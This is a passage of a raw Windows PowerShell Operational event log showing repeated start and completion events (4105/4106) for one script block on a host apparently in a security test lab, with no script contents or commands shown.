Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468425
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468424
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468423
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468422
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468421
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468420
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468419
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468418
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468417
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468416
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468415
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468414
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468413
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468412
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468411
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468410
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468409
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468408
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468407
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468406
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468405
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468404
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468403
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468402
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468401
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468400
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468399
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468398
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468397
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468396
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468395
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468394
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468393
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468392
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468391
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468390
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468389
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468388
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468387
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468386
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468385
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468384
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468383
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468382
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468381
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468380
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468379
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468378
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468377
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468376
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468375
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468374
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468373
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468372
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468371
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
